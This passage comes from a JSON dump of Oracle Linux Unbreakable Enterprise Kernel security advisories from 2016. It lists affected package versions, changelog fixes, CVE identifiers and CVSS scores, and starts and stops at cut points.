__get_user_pages_fast() function [orabug 14277030]\n- [oprofile] oprofile, x86: Fix nmi-unsafe callgraph support [orabug 14277030]\n- [oprofile] oprofile: use KM_NMI slot for kmap_atomic [orabug 14277030]\n- [oprofile] oprofile: i386 add get_user_pages_fast support [orabug 14277030]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] Patch shrink_zone to yield during severe mempressure events, avoiding\n hangs and evictions (John Sobecki,Chris Mason) [orabug 6086839]\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki,Chris Mason,Herbert van den Bergh) [orabug 9245919]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n- [usb] USB: fix __must_check warnings in drivers/usb/core/ (Junxiao Bi) [orabug 14795203]", "edition": 4, "reporter": "Oracle", "published": "2016-12-20T00:00:00", "title": "1 ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "modified": "2016-12-20T00:00:00", "id": "ELSA-2016-2962-1", "href": "http://linux.oracle.com/errata/ELSA-2016-2962-1.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:40:01", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.293.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.293.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.293.2.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.293.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.293.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.293.2.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.293.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.293.2.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.293.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.293.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.293.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.293.2.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.293.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.293.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.293.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.293.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.293.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.293.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.293.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.293.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.293.2.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.293.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.293.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.293.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.293.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.293.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.293.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.293.2.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.293.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.293.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}], "description": "[2.6.39-400.293.2]\n- x86/iopl/64: properly context-switch IOPL on Xen PV (Andy Lutomirski) [Orabug: 25269184] {CVE-2016-3157}\n- net: Fix use after free in the recvmmsg exit path (Arnaldo Carvalho de Melo) [Orabug: 25298618] {CVE-2016-7117}", "edition": 3, "reporter": "Oracle", "published": "2016-12-21T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-3157"], "modified": "2016-12-21T00:00:00", "id": "ELSA-2016-3657", "href": "http://linux.oracle.com/errata/ELSA-2016-3657.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:43:07", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.10.el7uek-0.5.3-2.el7.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.10.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.10.el6uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.10.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.10.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.10.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.10.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.10.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.10.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-61.1.10.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.10.el7uek-0.5.3-2.el7.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.10.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.10.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.10.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.10.el7uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.10.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.10.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.10.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.10.el6uek-0.5.3-2.el6.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.10.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.10.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-61.1.10.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.10.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.10.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.10.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.10.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.10.el6uek-0.5.3-2.el6.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.10.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.10.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.10.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.10.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.10.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.10.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.10.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.10.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.10.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "kernel-uek\n[4.1.12-61.1.10]\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n[4.1.12-61.1.9]\n- xen-blkback: don't get ref for each queue (Bob Liu) [Orabug: 24616917] \n- NVMe: Fix obtaining command result (Keith Busch) [Orabug: 24655742]\n[4.1.12-61.1.8]\n- Revert 'ixgbe: make a workaround to tx hang issue under dom' (Brian Maly) [Orabug: 24618738]\n[4.1.12-61.1.7]\n- x86/xen: Add x86_platform.is_untracked_pat_range quirk to ignore ISA regions. (Konrad Rzeszutek Wilk) [Orabug: 24566046]", "edition": 3, "reporter": "Oracle", "published": "2016-09-22T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-22T00:00:00", "id": "ELSA-2016-3619", "href": "http://linux.oracle.com/errata/ELSA-2016-3619.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:48:35", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.2.el7uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.15.2.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.15.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.15.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.15.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.15.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.15.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.15.2.el6uek-0.4.5-3.el6.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.15.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.15.2.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.15.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.15.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.2.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.15.2.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.15.2.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.15.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.15.2.el7uek-0.4.5-3.el7.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.15.2.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.15.2.el6uek-0.4.5-3.el6.src.rpm", "packageName": "dtrace-modules-3.8.13-118.15.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.15.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.2.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.15.2.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.15.2.el7uek-0.4.5-3.el7.src.rpm", "packageName": "dtrace-modules-3.8.13-118.15.2.el7uek", "operator": "lt"}], "description": "kernel-uek\n[3.8.13-118.15.2]\n- x86/iopl/64: properly context-switch IOPL on Xen PV (Andy Lutomirski) [Orabug: 25269176] {CVE-2016-3157} {CVE-2016-3157}\n- net: Fix use after free in the recvmmsg exit path (Arnaldo Carvalho de Melo) [Orabug: 25298611] {CVE-2016-7117}", "edition": 3, "reporter": "Oracle", "published": "2016-12-21T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-3157"], "modified": "2016-12-21T00:00:00", "id": "ELSA-2016-3656", "href": "http://linux.oracle.com/errata/ELSA-2016-3656.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:43", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.284.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.284.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.284.2.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.284.2.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.284.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.284.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.284.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.284.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.284.2.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.284.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.284.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.284.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.284.2.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.284.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.284.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.284.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.284.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.284.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.284.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.284.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.284.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.284.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.284.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.284.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.284.2.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.284.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.284.2.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.284.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.284.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.284.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "[2.6.39-400.284.2]\n- Btrfs: fix truncation of compressed and inlined extents (Divya 